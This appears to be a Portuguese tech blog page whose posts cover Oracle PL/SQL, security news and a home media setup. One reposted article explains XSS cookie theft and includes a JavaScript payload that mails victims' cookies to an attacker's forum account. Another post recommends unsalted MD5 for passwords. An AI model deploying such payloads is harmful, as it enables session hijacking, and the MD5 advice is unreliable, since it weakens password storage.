Uma forma de efetuar o checksum do seu fonte pl/sql

Posted on dez. 21 in Oracle with no comments

Lendo sobre segurança no Oracle encontrei algo muito interessante para os desenvolvedores e no controle de versão de seus fontes no cliente.
Já pensou em ter um valor hash do seu fonte para identificar se houve alteração no seu cliente a partir de dentro do Oracle?

É isso mesmo você como desenvolvedor pode fechar a versão e ao invés de ficar usando programas externos e tals pode controlar as versões tudo pelos códigos hash´s dos seus fontes.
Ai o controle fica ao seu encargo.

Tenho por exemplo de uma procedure chamada get_idade que podesmo usar:
Continue lendo no oraclehome…

Criptografando em MD5 no Oracle

Posted on mai. 19 in Banco de Dados, Geral, Linux (RH), Oracle, PL/SQL, Programação, Sistemas Operacionais with 1 comment

Esses dias um cliente me solicitou algo para criptografar senhas, já conhecia a package dba_obfuscation_toolkit e ai fui pesquisar mais sobre e achei uma forma otima para criptografar a senha em MD5, assim fiz a função dentro do owner do sistema que faz esta conversão:

  2.    v_input VARCHAR2(2000) := valor;
  3.    hexkey VARCHAR2(32) := NULL;
  5.    hexkey := RAWTOHEX(DBMS_OBFUSCATION_TOOLKIT.md5(input => UTL_RAW.cast_to_raw(v_input)));
  6.    RETURN NVL(hexkey,'');
  8.  

Exemplo da utilização:

  1. sql> SELECT md5('senhadorafael') FROM dual;
  2.     70CB17EBF6A8DF8525016F7866075794
  3.  

Oracle vai corrigir 41 brechas de segurança

Posted on abr. 12 in Banco de Dados, Oracle with no comments

"A Oracle anunciou para o próxima terça, 15/4, a correção de 41 vulnerabilidades que afetam muitos de seus produtos.Essas correções fazem parte do pacote que a empresa publica trimestralmente. Das 41 falhas, 17 referem-se ao banco de dados Oracle, o principal produto da empresa. E duas delas podem ser exploradas numa rede, sem a necessidade de senha e nome de usuário.

Além do Oracle Database, nas versões 9i, 10g e 11g, também são afetados os produtos Oracle Application Server, Oracle Collaboration Suite, Oracle E-Business Suite, Oracle PeopleSoft Enterprise PeopleTools, Oracle PeopleSoft Enterprise HCM e Oracle Siebel SimBuilder.

O alerta da Oracle com a descrição do pacote está no site da empresa."

Fonte: INFO

Solução inteligente de audio/vídeo para sua casa

Posted on nov. 24 in Sem categoria with 2 comments

Estava navegando na net pelos sites da DLink/Lynksys e tive algumas idéias de como fazer um acervo digital com um baixo custo em casa mesmo.

Mas o complicado é ter tempo para de fazer um acervo digital próprio e de um custo baixo é difícil pois temos que ficar gravando DVD's CD's e muitas vezes nem temos tempo e máquina suficiente para ficar convertendo isso para aquilo ou mesmo aquela coisa de assistir um fime no micro. Não tem coisa melhor que assistir um filme na sua TV ou ouvir uma boa musica no seu microsystem. Isso tudo porque temos internet rápida hoje em dia e nem usamos 50% da sua função que é fazer download. Assim poderias baixar por exemplo aquele album completo da sua banda preferida ou mesmo filmes da net.

Para isso temos que investir um pouco e teremos uma solução muito boa em casa de stream.

Precisariamos para ficar legalzinho a minha solução:

1. DSM-320 Wireless Media Player da DLINK

2. NAS200 Network Storage da Linksys

3. Nobreak (para maior segurança)

4. Access point (wifi de preferencia 54 ou 100Mbps)

5. mínimo de 1 HD de alta capacidade SATA / máximo 2 HD's SATA 2

6. TV

7. PC desktop ou notebook

Solução stream inteligente para sua casa

Neste exemplo eu teria 2 HD's de 750Gb podendo obter sua capacidade máxima de 1.5Tb fazendo um RAID0 ou tendo maior segurança fazendo um RAID1 assim teria um HD espelhado.

Como funciona:

Eu teria um ambiente separado de tudo para este equipamento(Nobreak/AP/ADSL/NAS). Assim com o AP ligado ao modem a casa inteira teria wifi para minha internet. Isso para uma maior segurança, há uma pequena explicação disto no final deste artigo.

Blz como a casa teria internet eu com o meu notebook lá do quarto deixo baixando uns MP3's e vídeos da net. Quando terminar eu transfiro tudo isso para o meu NAS200 e blz.

O NAS200 storage está ligado direto ao AP via RJ45 então quer dizer que qualquer micro que tenha acesso ao meu AP poderá ver o que tem no meu storage de stream.

Agora vem a parte interesante da Dlink com o media player DSM-320, que está primeiramente ligamo no aparelho de TV, Home Theater ou aparelho de som. E podemos configurar ele para pegar os arquivos via wifi do NAS200 storage da linksys, assim irá aparecer um navegador onde podemos escolher os arquivos de stream (audio/video) que queremos ouvir ou assistir.

Outro benefício é aquele que ninguém pensa, coloco seguro na casa e equipamentos, até ai blz. Mas se acontecer de algum dia vc for roubado, o maldito do ladrão entra e leva o seu micro ou notebook ? Bom se tiveres algum aplicativo que copia(backup) seus arquivos importantes para dentro do storage e este ficar em um ambiente separado seguro já que não precisa de fio(lembra?) assim vc terá bem guardado os seus dados pessoais, pois o seguro da casa não irá cobrir os dados eletronicos dos seus equipamentos.

 

Obs.: Pelo que eu estava lendo para arquivos DIVX por exemplo muitas vezes temos que baixar a legenda .srt .sub e tals, parece que o media player identifica isso e utiliza-o assim podendo ter legenda muitas vezes os arquivos que baixares da net. Mas ATENÇÃO eu nunca apliquei essa solução não sei dizer em questão de performance ou compatibilidade dos equipamentos, como estes equipamentos encontramos somente fora do Brasil estou com dificuldade de adiquerir ainda aqui para fazer um teste e dizer ... é essa solução é ótima. Mas na teoria é ótima.

 

 

Vc confia em todos os sites que tem o cadiadinho? SSL

Posted on fev. 09 in Sistemas Operacionais with no comments

Ae galera, vamos ficar ligado ai com a dica, eu já sabia que era possivel, mas agora q vi que o gmail tem essa falha.. meooo que fods... e claro o email seria algo nao tao grave, mas sim em relação a contas de banco, ou outras transacoes com dinheiro que possam implicar numa enorme falha de segurança, e digo nao do usuário e sim do site que está hospedando o serviço. tah tah.. vamos parar de enrolar e vou postar agora o videozinho q mostra como faz e detalhe funciona mesmo.


Hacking Email Passwords - video powered by Metacafe

Essa ferramenta que é utilizada no video é um sniffer, para quem nao sabe.

Artigo que explica passo-a-passo a nova técnica de roubo de cookies, por meio de AJAX.

Posted on jan. 15 in Ajax, HTML with no comments

Estava lendo na Total Security um artigo que mostra como alguém pode roubar cookies usando ajax.

"A grande maioria de ladrões de cookies utiliza métodos de localização em javascript; exemplo window.document.location=http://www.totalsecurity.com.br/ladraodecookie.php. Isso irá redirecionar o internauta para uma página diferente. Agora vamos tentar usar javascript inline, javascript: window.document.location=http://www.sitequequeroredirecionar.com; Essa é a forma mais velha de roubo de cookies. Mas usuários menos bestinhas, até mesmo os bestinhas desconfiarão, pois não estaram no endereço em que iniciaram. Por isso usar AJAX, você poderá roubar cookies de forma silenciosa. Resultado final: pessoas visitam algo como um fórum, até ai tudo bem, do nada a cookie do mesmo é roubada. Nada parece ter acontecido.

Ficou curioso como funciona? Pois bem... imaginemos que estamos em um fórum, que por sua vez tenha uma falha XSS. A missão é infiltrar no fórum, inserir um código javascript(AJAX, é claro) usando a tag para driblar o sistema do fórum. Nesse código, o usuário mandará o cookie dele para você numa mensagem privada, usando o sistema de mensagem do fórum, é claro :)

  1. *tags modificadas para [] respectivamente.<br />
  2. [img src=javascript:<br />
  3. //Vamos setar XMLHttpRequestObject falso para ver se retornará verdadeiro depois..<br />
  4. var XMLHTTPRequestObject = false;<br />
  5. if (window.XMLHttpRequest)<br />
  6. {<br />
  7. XMLHttpRequestObject = new XMLHttpRequest();<br />
  8. }<br />
  9. else if(window.ActiveXObject)<br />
  10. {<br />
  11. XMLHttpRequestObject = new ActiveXObject(Microsoft.XMLHTTP);<br />
  12. }<br />
  13. else<br />
  14. {<br />
  15. alert(Javascript não está ativado.);<br />
  16. }

O código acima é simples, verificará se XMLHttpRequest poderá ser gerado. Se não, uma caixa de alerta será mostrada e o resto do código que será inserido agora, não entrará em funcionamento.

  1. function socket()<br />
  2. {<br />
  3. /*A linha a seguir é muito importante. Se o site está usando POST para enviar as mensagens, então terá de mudar o código usando o seu HTTP debugger. Em SEUNOMEDEUSUÁRIO, você botará seu login no fórum para receber mensagem privada com o cookie da vítima pelo sistema de mensagem privada do fórum*/<br />
  4. XMLHttpRequestObject.open('GET', 'http://www.sitequalquer.com/privatemessage.php user=SEUNOMEDEUSUÁRIO&subject=' + window.document.cookie, true);<br />
  5. XMLHttpRequestObject.setRequestHeader(Content-Type, application/x-www-form-urlencoded);<br />
  6. XMLHttpRequestObject.send(null);<br />
  7. //Out of the Goodness of our heart =p<br />
  8. delete XMLHttpRequestObject;<br />
  9. }<br />
  10. //Não esquecer de fechar a tag, afinal, isso é uma imagem <img src="http://www.rstoever.com/wp-includes/images/smilies/icon_wink.gif" alt=";)" class="wp-smiley" /><br />
  11. window.document.onload='socket();']<br />
  12.  

Esse foi um exemplo claro e bem-sucedido de um código em AJAX para um fórum, em que, quando o post for acessado, o usuário enviará uma mensagem privada com o seu respectivo cookie para quem você desejar."

Fonte: Total Security

Segurança com PHP

Posted on jan. 13 in PHP, Programação with no comments

Segurança Em um forum de discussao um colega abordou a questao de segurança usando PHP nos aplicativos web, em geral e ele menciona que os maiores culpados por invasões entre outros é o programador PHP, nao somente o aplicativo da php.net. Claro tens seus defeitinhos e tals, mas se todos vissem na documentação e conhecesse esses sites que identificam quais versões que tem vulnerabilidades e o que fazer ou melhor nao fazer para que isso prejudique os seus clientes/servidor e tudo envolvido pelo aplicativo.

Bom a integra do artigo pode ser consultado aqui (SecurityFocus).

E para quem quer saber das vulnerabilidades que o PHP ou outro Software tem pode consulta na SecurityFocus que há listas de discução sobre o problema, soluções a tomar, entre outros detalhes.

Dicas sobre segurança para o PHP: Principais falhas de Segurança no PHP, Segurança em código PHP, Enganando o lammer .php -> .aspx